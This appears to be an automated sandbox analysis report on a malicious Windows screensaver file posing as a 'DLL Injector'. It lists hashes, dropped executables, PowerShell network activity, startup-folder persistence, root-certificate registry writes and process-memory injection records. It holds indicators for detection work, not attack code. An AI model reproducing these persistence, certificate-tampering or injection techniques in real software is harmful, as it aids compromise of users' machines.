Analysis
-
max time kernel
150s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
23/11/2023, 19:45
Behavioral task
behavioral1
Sample
DLL Injector Resou_nls..scr
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
DLL Injector Resou_nls..scr
Resource
win10v2004-20231025-en
General
-
Target
DLL Injector Resou_nls..scr
-
Size
571KB
-
MD5
f1bc7841474849a77e8e0b2e507f2ac7
-
SHA1
eea072584a9227f763d15d784eb52c64453c9505
-
SHA256
3b2776d93feca48f02f530dff6a3d4d918d94ce4e61c249b9f51f24d1d090d74
-
SHA512
e9d342ea6620fc1b69868d5b503363a685a50e7184ba28c310f9648b85ebbb3684eb5be08ff5dd678e1026499fe2c562eb45b0c28228e96b7746553f6a1d12b7
-
SSDEEP
12288:C7oVrmFrSStI0kPUjGn61DfVwZ3pSOPXb2c1wxC3Si+hjTO6HH:3i/i4Jt9wZ3/bTwxQgVTOOH
Malware Config
Signatures
-
Blocklisted process makes network request 12 IoCs
flow pid Process 20 1856 powershell.exe 21 1856 powershell.exe 23 1520 powershell.exe 24 1520 powershell.exe 26 1592 powershell.exe 27 1592 powershell.exe 29 1000 powershell.exe 30 1000 powershell.exe 32 3004 powershell.exe 33 3004 powershell.exe 35 344 powershell.exe 36 344 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe JV0sMlrH4P.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe JV0sMlrH4P.exe -
Executes dropped EXE 7 IoCs
pid Process 2960 kbfZNSrCxk.exe 2548 ejNKtmaS2q.exe 2168 EWMH14lt5V.exe 1404 eGEy2BBAjc.exe 760 t6mhfPW6v7.exe 1624 e0voTtq6Ld.exe 1148 JV0sMlrH4P.exe -
resource yara_rule behavioral1/memory/1212-0-0x000000013F630000-0x000000013F794000-memory.dmp upx behavioral1/memory/1212-19-0x000000013F630000-0x000000013F794000-memory.dmp upx behavioral1/memory/1212-151-0x000000013F630000-0x000000013F794000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\.sln rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\.sln\ = "sln_auto_file" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file\shell rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_Classes\Local Settings rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file\ rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file\shell\Read rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file\shell\Read\command rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" rundll32.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 DLL Injector Resou_nls..scr Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 DLL Injector Resou_nls..scr Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 DLL Injector Resou_nls..scr Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 DLL Injector Resou_nls..scr Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 DLL Injector Resou_nls..scr Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 DLL Injector Resou_nls..scr Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 DLL Injector Resou_nls..scr Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 DLL Injector Resou_nls..scr Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 DLL Injector Resou_nls..scr Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 DLL Injector Resou_nls..scr -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1148 JV0sMlrH4P.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1520 powershell.exe 1856 powershell.exe 1592 powershell.exe 1000 powershell.exe 3004 powershell.exe 344 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1092 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 1000 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe Token: SeDebugPrivilege 344 powershell.exe Token: SeDebugPrivilege 1148 JV0sMlrH4P.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1092 AcroRd32.exe 1092 AcroRd32.exe 1092 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1212 wrote to memory of 2556 1212 DLL Injector Resou_nls..scr 28 PID 1212 wrote to memory of 2556 1212 DLL Injector Resou_nls..scr 28 PID 1212 wrote to memory of 2556 1212 DLL Injector Resou_nls..scr 28 PID 2556 wrote to memory of 268 2556 cmd.exe 30 PID 2556 wrote to memory of 268 2556 cmd.exe 30 PID 2556 wrote to memory of 268 2556 cmd.exe 30 PID 1212 wrote to memory of 2916 1212 DLL Injector Resou_nls..scr 31 PID 1212 wrote to memory of 2916 1212 DLL Injector Resou_nls..scr 31 PID 1212 wrote to memory of 2916 1212 DLL Injector Resou_nls..scr 31 PID 2916 wrote to memory of 2960 2916 cmd.exe 33 PID 2916 wrote to memory of 2960 2916 cmd.exe 33 PID 2916 wrote to memory of 2960 2916 cmd.exe 33 PID 1212 wrote to memory of 756 1212 DLL Injector Resou_nls..scr 34 PID 1212 wrote to memory of 756 1212 DLL Injector Resou_nls..scr 34 PID 1212 wrote to memory of 756 1212 DLL Injector Resou_nls..scr 34 PID 756 wrote to memory of 2548 756 cmd.exe 36 PID 756 wrote to memory of 2548 756 cmd.exe 36 PID 756 wrote to memory of 2548 756 cmd.exe 36 PID 1212 wrote to memory of 1564 1212 DLL Injector Resou_nls..scr 37 PID 1212 wrote to memory of 1564 1212 DLL Injector Resou_nls..scr 37 PID 1212 wrote to memory of 1564 1212 DLL Injector Resou_nls..scr 37 PID 1564 wrote to memory of 2168 1564 cmd.exe 39 PID 1564 wrote to memory of 2168 1564 cmd.exe 39 PID 1564 wrote to memory of 2168 1564 cmd.exe 39 PID 2548 wrote to memory of 1520 2548 ejNKtmaS2q.exe 48 PID 2548 wrote to memory of 1520 2548 ejNKtmaS2q.exe 48 PID 2548 wrote to memory of 1520 2548 ejNKtmaS2q.exe 48 PID 2960 wrote to memory of 1856 2960 kbfZNSrCxk.exe 47 PID 2960 wrote to memory of 1856 2960 kbfZNSrCxk.exe 47 PID 2960 wrote to memory of 1856 2960 kbfZNSrCxk.exe 47 PID 1212 wrote to memory of 2880 1212 DLL Injector Resou_nls..scr 41 PID 1212 wrote to memory of 2880 1212 DLL Injector Resou_nls..scr 41 PID 1212 wrote to memory of 2880 1212 DLL Injector Resou_nls..scr 41 PID 2168 wrote to memory of 1592 2168 EWMH14lt5V.exe 44 PID 2168 wrote to memory of 1592 2168 EWMH14lt5V.exe 44 PID 2168 wrote to memory of 1592 2168 EWMH14lt5V.exe 44 PID 2880 wrote to memory of 1404 2880 cmd.exe 43 PID 2880 wrote to memory of 1404 2880 cmd.exe 43 PID 2880 wrote to memory of 1404 2880 cmd.exe 43 PID 1212 wrote to memory of 2328 1212 DLL Injector Resou_nls..scr 52 PID 1212 wrote to memory of 2328 1212 DLL Injector Resou_nls..scr 52 PID 1212 wrote to memory of 2328 1212 DLL Injector Resou_nls..scr 52 PID 2328 wrote to memory of 760 2328 cmd.exe 51 PID 2328 wrote to memory of 760 2328 cmd.exe 51 PID 2328 wrote to memory of 760 2328 cmd.exe 51 PID 1404 wrote to memory of 1000 1404 eGEy2BBAjc.exe 50 PID 1404 wrote to memory of 1000 1404 eGEy2BBAjc.exe 50 PID 1404 wrote to memory of 1000 1404 eGEy2BBAjc.exe 50 PID 268 wrote to memory of 1092 268 rundll32.exe 56 PID 268 wrote to memory of 1092 268 rundll32.exe 56 PID 268 wrote to memory of 1092 268 rundll32.exe 56 PID 268 wrote to memory of 1092 268 rundll32.exe 56 PID 1212 wrote to memory of 2872 1212 DLL Injector Resou_nls..scr 55 PID 1212 wrote to memory of 2872 1212 DLL Injector Resou_nls..scr 55 PID 1212 wrote to memory of 2872 1212 DLL Injector Resou_nls..scr 55 PID 2872 wrote to memory of 1624 2872 cmd.exe 57 PID 2872 wrote to memory of 1624 2872 cmd.exe 57 PID 2872 wrote to memory of 1624 2872 cmd.exe 57 PID 1212 wrote to memory of 1908 1212 DLL Injector Resou_nls..scr 63 PID 1212 wrote to memory of 1908 1212 DLL Injector Resou_nls..scr 63 PID 1212 wrote to memory of 1908 1212 DLL Injector Resou_nls..scr 63 PID 760 wrote to memory of 3004 760 t6mhfPW6v7.exe 61 PID 760 wrote to memory of 3004 760 t6mhfPW6v7.exe 61 PID 760 wrote to memory of 3004 760 t6mhfPW6v7.exe 61
Processes
-
C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr"C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr" /S1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\5xL2BNRi9u.sln2⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
